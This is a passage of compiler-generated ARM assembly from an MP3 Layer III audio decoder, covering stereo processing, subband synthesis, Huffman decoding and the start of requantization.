beq .L374 ldr r2, .L393+4 ldr r3, [fp, #-32] add r3, r3, #41 ldr r2, [r2, r3, lsl #3] ldr r1, .L393+4 ldr r3, [fp, #-32] lsl r3, r3, #3 add r3, r1, r3 ldr r3, [r3, #332] cmp r2, r3 movhi r3, #1 movls r3, #0 and r3, r3, #255 mov r1, r3 ldr r2, .L393+4 ldr r3, [fp, #-32] lsl r3, r3, #1 add r3, r3, r1 add r3, r3, #82 ldr r3, [r2, r3, lsl #2] str r3, [fp, #-20] mov r3, #0 str r3, [fp, #-28] b .L375 .L376: ldr r1, .L393+8 ldr r2, [fp, #-32] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-28] add r3, r3, r2 add r3, r3, #228 ldr r0, [r1, r3, lsl #2] @ float ldr r1, .L393+8 ldr r2, [fp, #-32] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-28] add r3, r3, r2 add r3, r3, #804 ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 bl __aeabi_fadd mov r3, r0 mov r0, r3 bl __aeabi_f2d ldr r2, .L393+12 ldr r3, .L393+16 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-16] @ float ldr r1, .L393+8 ldr r2, [fp, #-32] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-28] add r3, r3, r2 add r3, r3, #228 ldr r0, [r1, r3, lsl #2] @ float ldr r1, .L393+8 ldr r2, [fp, #-32] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-28] add r3, r3, r2 add r3, r3, #804 ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 bl __aeabi_fsub mov r3, r0 mov r0, r3 bl __aeabi_f2d ldr r2, .L393+12 ldr r3, .L393+16 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-12] @ float ldr r1, .L393+8 ldr r2, [fp, #-32] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-28] add r3, r3, r2 add r3, r3, #228 ldr r2, [fp, #-16] @ float str r2, [r1, r3, lsl #2] @ float ldr r1, .L393+8 ldr r2, [fp, #-32] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #7 ldr r2, [fp, #-28] add r3, r3, r2 add r3, r3, #804 ldr r2, [fp, #-12] @ float str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L375: ldr r2, [fp, #-28] ldr r3, [fp, #-20] cmp r2, r3 bcc .L376 .L374: ldr r3, .L393 ldr r3, [r3, #32] and r3, r3, #1 cmp r3, #0 beq .L370 ldr r3, .L393 ldr r3, [r3, #16] str r3, [fp, #-8] ldr r2, .L393+4 ldr r3, [fp, #-32] add r3, r3, #13 ldr r3, [r2, r3, lsl #3] cmp r3, #1 bne .L377 ldr r2, .L393+4 ldr r3, [fp, #-32] add r3, r3, #15 ldr r3, [r2, r3, lsl #3] cmp r3, #2 bne .L377 ldr r2, .L393+4 ldr r3, [fp, #-32] add r3, r3, #17 ldr r3, [r2, r3, lsl #3] cmp r3, #0 beq .L378 mov r3, #0 str r3, [fp, #-24] b .L379 .L381: ldr r1, .L393+20 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-24] add r3, r3, r2 ldr r2, [r1, r3, lsl #2] ldr r1, .L393+4 ldr r3, [fp, #-32] lsl r3, r3, #3 add r3, r1, r3 ldr r3, [r3, #332] cmp r2, r3 bcc .L380 ldr r1, [fp, #-24] ldr r0, [fp, #-32] bl Stereo_Process_Intensity_Long .L380: ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L379: ldr r3, [fp, #-24] cmp r3, #7 bls .L381 mov r3, #3 str r3, [fp, #-24] b .L382 .L384: ldr r1, .L393+20 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-24] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r1, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r2, r3, r2 ldr r1, .L393+4 ldr r3, [fp, #-32] lsl r3, r3, #3 add r3, r1, r3 ldr r3, [r3, #332] cmp r2, r3 bcc .L383 ldr r1, [fp, #-24] ldr r0, [fp, #-32] bl Stereo_Process_Intensity_Short .L383: ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L382: ldr r3, [fp, #-24] cmp r3, #11 bls .L384 b .L370 .L378: mov r3, #0 str r3, [fp, #-24] b .L386 .L388: ldr r1, .L393+20 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-24] add r3, r3, r2 add r3, r3, #22 lsl r3, r3, #2 add r3, r1, r3 ldr r2, [r3, #4] mov r3, r2 lsl r3, r3, #1 add r2, r3, r2 ldr r1, .L393+4 ldr r3, [fp, #-32] lsl r3, r3, #3 add r3, r1, r3 ldr r3, [r3, #332] cmp r2, r3 bcc .L387 ldr r1, [fp, #-24] ldr r0, [fp, #-32] bl Stereo_Process_Intensity_Short .L387: ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L386: ldr r3, [fp, #-24] cmp r3, #11 bls .L388 b .L370 .L377: mov r3, #0 str r3, [fp, #-24] b .L389 .L391: ldr r1, .L393+20 ldr r2, [fp, #-8] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 ldr r2, [fp, #-24] add r3, r3, r2 ldr r2, [r1, r3, lsl #2] ldr r1, .L393+4 ldr r3, [fp, #-32] lsl r3, r3, #3 add r3, r1, r3 ldr r3, [r3, #332] cmp r2, r3 bcc .L390 ldr r1, [fp, #-24] ldr r0, [fp, #-32] bl Stereo_Process_Intensity_Long .L390: ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L389: ldr r3, [fp, #-24] cmp r3, #20 bls .L391 b .L370 .L392: nop .L370: sub sp, fp, #4 @ sp needed pop {fp, pc} .L394: .align 2 .L393: .word g_frame_header .word g_side_info .word g_main_data .word 1719614413 .word 1072079006 .word g_sf_band_indices .size L3_Stereo, .-L3_Stereo .global __aeabi_d2iz .section .rodata .align 2 .LC19: .word __stack_chk_guard .text .align 2 .syntax unified .arm .fpu softvfp .type L3_Subband_Synthesis, %function L3_Subband_Synthesis: @ args = 0, pretend = 0, frame = 2224 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #2224 sub sp, sp, #4 str r0, [fp, #-2224] str r1, [fp, #-2228] str r2, [fp, #-2232] ldr r3, .L439 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 ldr r3, .L439+4 ldr r3, [r3, #28] cmp r3, #3 bne .L396 mov r3, #1 b .L397 .L396: mov r3, #2 .L397: str r3, [fp, #-2196] ldr r3, .L439+8 ldr r3, [r3] cmp r3, #0 beq .L398 mov r3, #0 str r3, [fp, #-2208] b .L399 .L402: mov r3, #0 str r3, [fp, #-2204] b .L400 .L401: ldr r3, [fp, #-2208] add r3, r3, #16 mov r0, r3 bl __aeabi_ui2f mov r4, r0 ldr r3, [fp, #-2204] lsl r3, r3, #1 add r3, r3, #1 mov r0, r3 bl __aeabi_ui2f mov r3, r0 mov r1, r3 mov r0, r4 bl __aeabi_fmul mov r3, r0 mov r0, r3 bl __aeabi_f2d ldr r2, .L439+12 ldr r3, .L439+16 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl cos mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r1, r0 ldr r0, .L439+20 ldr r3, [fp, #-2208] lsl r2, r3, #5 ldr r3, [fp, #-2204] add r3, r2, r3 str r1, [r0, r3, lsl #2] @ float ldr r3, [fp, #-2204] add r3, r3, #1 str r3, [fp, #-2204] .L400: ldr r3, [fp, #-2204] cmp r3, #31 bls .L401 ldr r3, [fp, #-2208] add r3, r3, #1 str r3, [fp, #-2208] .L399: ldr r3, [fp, #-2208] cmp r3, #63 bls .L402 mov r3, #0 str r3, [fp, #-2208] b .L403 .L406: mov r3, #0 str r3, [fp, #-2204] b .L404 .L405: ldr r1, .L439+24 ldr r3, [fp, #-2208] lsl r2, r3, #10 ldr r3, [fp, #-2204] add r3, r2, r3 mov r2, #0 str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-2204] add r3, r3, #1 str r3, [fp, #-2204] .L404: ldr r3, [fp, #-2204] cmp r3, #1024 bcc .L405 ldr r3, [fp, #-2208] add r3, r3, #1 str r3, [fp, #-2208] .L403: ldr r3, [fp, #-2208] cmp r3, #1 bls .L406 ldr r3, .L439+8 mov r2, #0 str r2, [r3] .L398: ldr r3, .L439+28 ldr r3, [r3] cmp r3, #0 beq .L407 mov r3, #0 str r3, [fp, #-2208] b .L408 .L411: mov r3, #0 str r3, [fp, #-2204] b .L409 .L410: ldr r1, .L439+24 ldr r3, [fp, #-2208] lsl r2, r3, #10 ldr r3, [fp, #-2204] add r3, r2, r3 mov r2, #0 str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-2204] add r3, r3, #1 str r3, [fp, #-2204] .L409: ldr r3, [fp, #-2204] cmp r3, #1024 bcc .L410 ldr r3, [fp, #-2208] add r3, r3, #1 str r3, [fp, #-2208] .L408: ldr r3, [fp, #-2208] cmp r3, #1 bls .L411 ldr r3, .L439+28 mov r2, #0 str r2, [r3] .L407: mov r3, #0 str r3, [fp, #-2200] b .L412 .L436: ldr r3, .L439+32 str r3, [fp, #-2208] b .L413 .L414: ldr r3, [fp, #-2208] sub r3, r3, #64 ldr r1, .L439+24 ldr r2, [fp, #-2228] lsl r2, r2, #10 add r3, r2, r3 ldr r2, [r1, r3, lsl #2] @ float ldr r0, .L439+24 ldr r3, [fp, #-2228] lsl r1, r3, #10 ldr r3, [fp, #-2208] add r3, r1, r3 str r2, [r0, r3, lsl #2] @ float ldr r3, [fp, #-2208] sub r3, r3, #1 str r3, [fp, #-2208] .L413: ldr r3, [fp, #-2208] cmp r3, #63 bhi .L414 mov r3, #0 str r3, [fp, #-2208] b .L415 .L416: ldr r2, [fp, #-2208] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #1 mov r2, r3 ldr r3, [fp, #-2200] add r0, r2, r3 ldr ip, .L439+36 ldr r3, [fp, #-2228] ldr r1, [fp, #-2224] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, r0 add r3, r3, #228 ldr r2, [ip, r3, lsl #2] @ float ldr r3, [fp, #-2208] lsl r3, r3, #2 sub r1, fp, #12 add r3, r1, r3 str r2, [r3, #-2180] @ float ldr r3, [fp, #-2208] add r3, r3, #1 str r3, [fp, #-2208] .L415: ldr r3, [fp, #-2208] cmp r3, #31 bls .L416 mov r3, #0 str r3, [fp, #-2208] b .L417 .L420: mov r3, #0 str r3, [fp, #-2216] @ float mov r3, #0 str r3, [fp, #-2204] b .L418 .L419: ldr r1, .L439+20 ldr r3, [fp, #-2208] lsl r2, r3, #5 ldr r3, [fp, #-2204] add r3, r2, r3 ldr r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-2204] lsl r3, r3, #2 sub r1, fp, #12 add r3, r1, r3 ldr r3, [r3, #-2180] @ float mov r1, r3 mov r0, r2 bl __aeabi_fmul mov r3, r0 mov r1, r3 ldr r0, [fp, #-2216] @ float bl __aeabi_fadd mov r3, r0 str r3, [fp, #-2216] @ float ldr r3, [fp, #-2204] add r3, r3, #1 str r3, [fp, #-2204] .L418: ldr r3, [fp, #-2204] cmp r3, #31 bls .L419 ldr r1, .L439+24 ldr r3, [fp, #-2228] lsl r2, r3, #10 ldr r3, [fp, #-2208] add r3, r2, r3 ldr r2, [fp, #-2216] @ float str r2, [r1, r3, lsl #2] @ float ldr r3, [fp, #-2208] add r3, r3, #1 str r3, [fp, #-2208] .L417: ldr r3, [fp, #-2208] cmp r3, #63 bls .L420 mov r3, #0 str r3, [fp, #-2208] b .L421 .L424: mov r3, #0 str r3, [fp, #-2204] b .L422 .L423: ldr r3, [fp, #-2208] lsl r2, r3, #7 ldr r3, [fp, #-2204] add r2, r2, r3 ldr r3, [fp, #-2208] lsl r1, r3, #6 ldr r3, [fp, #-2204] add r3, r1, r3 ldr r0, .L439+24 ldr r1, [fp, #-2228] lsl r1, r1, #10 add r2, r1, r2 ldr r2, [r0, r2, lsl #2] @ float lsl r3, r3, #2 sub r1, fp, #12 add r3, r1, r3 str r2, [r3, #-2052] @ float ldr r3, [fp, #-2208] lsl r2, r3, #7 ldr r3, [fp, #-2204] add r3, r2, r3 add r2, r3, #96 ldr r3, [fp, #-2208] lsl r1, r3, #6 ldr r3, [fp, #-2204] add r3, r1, r3 add r3, r3, #32 ldr r0, .L439+24 ldr r1, [fp, #-2228] lsl r1, r1, #10 add r2, r1, r2 ldr r2, [r0, r2, lsl #2] @ float lsl r3, r3, #2 sub r1, fp, #12 add r3, r1, r3 str r2, [r3, #-2052] @ float ldr r3, [fp, #-2204] add r3, r3, #1 str r3, [fp, #-2204] .L422: ldr r3, [fp, #-2204] cmp r3, #31 bls .L423 ldr r3, [fp, #-2208] add r3, r3, #1 str r3, [fp, #-2208] .L421: ldr r3, [fp, #-2208] cmp r3, #7 bls .L424 mov r3, #0 str r3, [fp, #-2208] b .L425 .L426: ldr r3, [fp, #-2208] lsl r3, r3, #2 sub r2, fp, #12 add r3, r2, r3 ldr r2, [r3, #-2052] @ float ldr r1, .L439+40 ldr r3, [fp, #-2208] ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 mov r0, r2 bl __aeabi_fmul mov r3, r0 mov r2, r3 ldr r3, [fp, #-2208] lsl r3, r3, #2 sub r1, fp, #12 add r3, r1, r3 str r2, [r3, #-2052] @ float ldr r3, [fp, #-2208] add r3, r3, #1 str r3, [fp, #-2208] .L425: ldr r3, [fp, #-2208] cmp r3, #512 bcc .L426 mov r3, #0 str r3, [fp, #-2208] b .L427 .L435: mov r3, #0 str r3, [fp, #-2216] @ float mov r3, #0 str r3, [fp, #-2204] b .L428 .L429: ldr r3, [fp, #-2204] lsl r2, r3, #5 ldr r3, [fp, #-2208] add r3, r2, r3 lsl r3, r3, #2 sub r2, fp, #12 add r3, r2, r3 ldr r3, [r3, #-2052] @ float mov r1, r3 ldr r0, [fp, #-2216] @ float bl __aeabi_fadd mov r3, r0 str r3, [fp, #-2216] @ float ldr r3, [fp, #-2204] add r3, r3, #1 str r3, [fp, #-2204] .L428: ldr r3, [fp, #-2204] cmp r3, #15 bls .L429 ldr r0, [fp, #-2216] @ float bl __aeabi_f2d mov r2, #0 ldr r3, .L439+44 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2iz mov r3, r0 str r3, [fp, #-2212] ldr r3, [fp, #-2212] cmp r3, #32768 blt .L430 ldr r3, .L439+48 str r3, [fp, #-2212] b .L431 .L430: ldr r3, [fp, #-2212] cmn r3, #32768 bgt .L431 ldr r3, .L439+52 str r3, [fp, #-2212] .L431: ldr r3, [fp, #-2212] lsl r3, r3, #16 lsr r3, r3, #16 str r3, [fp, #-2212] ldr r3, [fp, #-2228] cmp r3, #0 bne .L432 ldr r3, [fp, #-2196] cmp r3, #1 bne .L433 ldr r3, [fp, #-2212] lsl r2, r3, #16 ldr r3, [fp, #-2212] orr r1, r2, r3 ldr r3, [fp, #-2200] lsl r2, r3, #5 ldr r3, [fp, #-2208] add r3, r2, r3 lsl r3, r3, #2 ldr r2, [fp, #-2232] add r3, r2, r3 mov r2, r1 str r2, [r3] b .L434 .L433: ldr r3, [fp, #-2212] lsl r1, r3, #16 ldr r3, [fp, #-2200] lsl r2, r3, #5 ldr r3, [fp, #-2208] add r3, r2, r3 lsl r3, r3, #2 ldr r2, [fp, #-2232] add r3, r2, r3 mov r2, r1 str r2, [r3] b .L434 .L432: ldr r3, [fp, #-2200] lsl r2, r3, #5 ldr r3, [fp, #-2208] add r3, r2, r3 lsl r3, r3, #2 ldr r2, [fp, #-2232] add r3, r2, r3 ldr r1, [r3] ldr r2, [fp, #-2212] ldr r3, [fp, #-2200] lsl r0, r3, #5 ldr r3, [fp, #-2208] add r3, r0, r3 lsl r3, r3, #2 ldr r0, [fp, #-2232] add r3, r0, r3 orr r2, r1, r2 str r2, [r3] .L434: ldr r3, [fp, #-2208] add r3, r3, #1 str r3, [fp, #-2208] .L427: ldr r3, [fp, #-2208] cmp r3, #31 bls .L435 ldr r3, [fp, #-2200] add r3, r3, #1 str r3, [fp, #-2200] .L412: ldr r3, [fp, #-2200] cmp r3, #17 bls .L436 nop ldr r3, .L439 ldr r2, [r3] ldr r3, [fp, #-16] eors r2, r3, r2 mov r3, #0 beq .L438 bl __stack_chk_fail .L438: sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L440: .align 2 .L439: .word .LC19 .word g_frame_header .word init.7775 .word 1413754136 .word 1068048891 .word g_synth_n_win.7780 .word v_vec.7781 .word synth_init .word 1023 .word g_main_data .word g_synth_dtbl .word 1088421824 .word 32767 .word -32767 .size L3_Subband_Synthesis, .-L3_Subband_Synthesis .global __aeabi_i2f .section .rodata .align 2 .LC20: .word __stack_chk_guard .text .align 2 .syntax unified .arm .fpu softvfp .type Read_Huffman, %function Read_Huffman: @ args = 0, pretend = 0, frame = 64 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #76 str r0, [fp, #-64] str r1, [fp, #-68] str r2, [fp, #-72] ldr r3, .L467 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #10 ldr r3, [r1, r3, lsl #2] cmp r3, #0 bne .L442 mov r3, #0 str r3, [fp, #-36] b .L443 .L444: ldr r0, .L467+8 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-36] add r3, r2, r3 add r3, r3, #228 mov r2, #0 str r2, [r0, r3, lsl #2] @ float ldr r3, [fp, #-36] add r3, r3, #1 str r3, [fp, #-36] .L443: ldr r3, [fp, #-36] cmp r3, #576 bcc .L444 b .L441 .L442: ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #10 ldr r2, [r1, r3, lsl #2] ldr r3, [fp, #-64] add r3, r2, r3 sub r3, r3, #1 str r3, [fp, #-24] ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #26 ldr r3, [r1, r3, lsl #2] cmp r3, #1 bne .L446 ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #30 ldr r3, [r1, r3, lsl #2] cmp r3, #2 bne .L446 mov r3, #36 str r3, [fp, #-32] mov r3, #576 str r3, [fp, #-28] b .L447 .L446: ldr r3, .L467+12 ldr r3, [r3, #16] str r3, [fp, #-20] ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #62 ldr r3, [r1, r3, lsl #2] add r1, r3, #1 ldr r0, .L467+16 ldr r2, [fp, #-20] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 ldr r3, [r0, r3, lsl #2] str r3, [fp, #-32] ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #62 ldr r2, [r1, r3, lsl #2] ldr r0, .L467+4 ldr r3, [fp, #-68] lsl r1, r3, #1 ldr r3, [fp, #-72] add r3, r1, r3 add r3, r3, #66 ldr r3, [r0, r3, lsl #2] add r3, r2, r3 add r1, r3, #2 ldr r0, .L467+16 ldr r2, [fp, #-20] mov r3, r2 lsl r3, r3, #3 add r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 add r3, r3, r1 ldr r3, [r0, r3, lsl #2] str r3, [fp, #-28] .L447: mov r3, #0 str r3, [fp, #-36] b .L448 .L452: ldr r2, [fp, #-36] ldr r3, [fp, #-32] cmp r2, r3 bcs .L449 ldr r0, .L467+4 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 lsl r3, r2, #2 mov r2, r3 mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r3, r3, #3 add r3, r2, r3 add r3, r0, r3 add r3, r3, #152 ldr r3, [r3] str r3, [fp, #-40] b .L450 .L449: ldr r2, [fp, #-36] ldr r3, [fp, #-28] cmp r2, r3 bcs .L451 ldr r0, .L467+4 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 lsl r3, r2, #2 mov r2, r3 mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r3, r3, #3 add r3, r2, r3 add r3, r0, r3 add r3, r3, #156 ldr r3, [r3] str r3, [fp, #-40] b .L450 .L451: ldr r0, .L467+4 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #1 add r2, r2, r3 lsl r3, r2, #2 mov r2, r3 mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r3, r3, #3 add r3, r2, r3 add r3, r0, r3 add r3, r3, #160 ldr r3, [r3] str r3, [fp, #-40] .L450: sub r0, fp, #48 sub r2, fp, #52 sub r1, fp, #56 sub r3, fp, #44 str r3, [sp] mov r3, r0 ldr r0, [fp, #-40] bl Huffman_Decode ldr r2, [fp, #-56] ldr r4, [fp, #-36] add r3, r4, #1 str r3, [fp, #-36] mov r0, r2 bl __aeabi_i2f ldr ip, .L467+8 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, r4 add r3, r3, #228 str r0, [ip, r3, lsl #2] @ float ldr r3, [fp, #-52] mov r0, r3 bl __aeabi_i2f ldr ip, .L467+8 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-36] add r3, r2, r3 add r3, r3, #228 str r0, [ip, r3, lsl #2] @ float ldr r3, [fp, #-36] add r3, r3, #1 str r3, [fp, #-36] .L448: ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #14 ldr r3, [r1, r3, lsl #2] lsl r3, r3, #1 ldr r2, [fp, #-36] cmp r2, r3 bcc .L452 ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #78 ldr r3, [r1, r3, lsl #2] add r3, r3, #32 str r3, [fp, #-40] ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #14 ldr r3, [r1, r3, lsl #2] lsl r3, r3, #1 str r3, [fp, #-36] b .L453 .L458: sub r0, fp, #48 sub r2, fp, #52 sub r1, fp, #56 sub r3, fp, #44 str r3, [sp] mov r3, r0 ldr r0, [fp, #-40] bl Huffman_Decode ldr r2, [fp, #-48] ldr r4, [fp, #-36] add r3, r4, #1 str r3, [fp, #-36] mov r0, r2 bl __aeabi_i2f ldr ip, .L467+8 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, r4 add r3, r3, #228 str r0, [ip, r3, lsl #2] @ float ldr r3, [fp, #-36] cmp r3, #576 bcs .L464 ldr r2, [fp, #-44] ldr r4, [fp, #-36] add r3, r4, #1 str r3, [fp, #-36] mov r0, r2 bl __aeabi_i2f ldr ip, .L467+8 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, r4 add r3, r3, #228 str r0, [ip, r3, lsl #2] @ float ldr r3, [fp, #-36] cmp r3, #576 bcs .L465 ldr r2, [fp, #-56] ldr r4, [fp, #-36] add r3, r4, #1 str r3, [fp, #-36] mov r0, r2 bl __aeabi_i2f ldr ip, .L467+8 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r3, r2, r3 add r3, r3, r4 add r3, r3, #228 str r0, [ip, r3, lsl #2] @ float ldr r3, [fp, #-36] cmp r3, #576 bcs .L466 ldr r3, [fp, #-52] mov r0, r3 bl __aeabi_i2f ldr ip, .L467+8 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-36] add r3, r2, r3 add r3, r3, #228 str r0, [ip, r3, lsl #2] @ float ldr r3, [fp, #-36] add r3, r3, #1 str r3, [fp, #-36] .L453: ldr r3, [fp, #-36] cmp r3, #572 bhi .L455 bl Get_Main_Pos mov r2, r0 ldr r3, [fp, #-24] cmp r3, r2 bcs .L458 b .L455 .L464: nop b .L455 .L465: nop b .L455 .L466: nop .L455: bl Get_Main_Pos mov r2, r0 ldr r3, [fp, #-24] add r3, r3, #1 cmp r2, r3 bls .L459 ldr r3, [fp, #-36] sub r3, r3, #4 str r3, [fp, #-36] .L459: ldr r1, .L467+4 ldr r3, [fp, #-68] lsl r2, r3, #1 ldr r3, [fp, #-72] add r3, r2, r3 add r3, r3, #82 ldr r2, [fp, #-36] str r2, [r1, r3, lsl #2] b .L460 .L461: ldr r0, .L467+8 ldr r3, [fp, #-72] ldr r1, [fp, #-68] mov r2, r3 lsl r2, r2, #3 add r2, r2, r3 lsl r3, r2, #6 mov r2, r3 mov r3, r1 lsl r3, r3, #3 add r3, r3, r1 lsl r3, r3, #7 add r2, r2, r3 ldr r3, [fp, #-36] add r3, r2, r3 add r3, r3, #228 mov r2, #0 str r2, [r0, r3, lsl #2] @ float ldr r3, [fp, #-36] add r3, r3, #1 str r3, [fp, #-36] .L460: ldr r3, [fp, #-36] cmp r3, #576 bcc .L461 ldr r3, [fp, #-24] add r3, r3, #1 mov r0, r3 bl Set_Main_Pos nop .L441: ldr r3, .L467 ldr r2, [r3] ldr r3, [fp, #-16] eors r2, r3, r2 mov r3, #0 beq .L463 bl __stack_chk_fail .L463: sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L468: .align 2 .L467: .word .LC20 .word g_side_info .word g_main_data .word g_frame_header .word g_sf_band_indices .size Read_Huffman, .-Read_Huffman .global __aeabi_i2d .global __aeabi_fcmplt .global __aeabi_f2uiz .align 2 .syntax unified .arm .fpu softvfp .type Requantize_Process_Long, %function Requantize_Process_Long: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #40 str r0, [fp, #-32] str r1, [fp, #-36] str r2, [fp, #-40] str r3, [fp, #-44] ldr r1, .L478 ldr r3, [fp, #-32] lsl r2, r3, #1 ldr r3, [fp, #-36] add r3, r2, r3 add r3, r3, #74 ldr r3, [r1, r3, lsl #2] cmp r3, #0 beq .L470 mov r3, #1065353216 b .L471 .L470: mov r3, #1056964608 .L471: str r3, [fp, #-24] @ float ldr r1, .L478 ldr r3, [fp, #-32] lsl r2, r3, #1 ldr r3, [fp, #-36] add r3, r2, r3 add r3, r3, #70 ldr r3, [r1, r3, lsl #2] mov r0, r3 bl __aeabi_ui2f mov r2, r0 ldr r1, .L478+4 ldr r3, [fp, #-44] ldr r3, [r1, r3, lsl #2] @ float mov r1, r3 mov r0, r2 bl __aeabi_fmul mov r3, r0 str r3, [fp, #-20] @ float ldr r0, .L478+8 ldr r1, [fp, #-36] ldr r2, [fp, #-32] mov r3, r1 lsl r3, r3, #1 add r3, r3, r1 lsl r1, r3, #3 sub r1, r1, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 